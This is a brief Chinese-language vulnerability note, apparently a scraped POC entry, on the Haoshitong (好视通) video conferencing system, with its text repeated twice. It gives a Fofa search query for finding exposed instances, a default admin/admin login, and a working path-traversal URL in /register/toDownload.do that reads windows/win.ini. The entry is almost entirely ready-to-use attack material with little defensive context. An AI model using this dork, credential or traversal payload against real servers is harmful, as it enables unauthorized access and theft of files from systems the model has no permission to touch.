描述
系统存在弱口令和任意文件下载漏洞
Fofa
app="好视通-视频会议"
弱口令
POC
admin/admin
登录界面
登录成功
任意文件下载
POC
/register/toDownload.do?fileName=敏感文件路径
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)
系统存在弱口令和任意文件下载漏洞
app="好视通-视频会议"
POC
admin/admin
登录界面
登录成功
POC
/register/toDownload.do?fileName=敏感文件路径
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)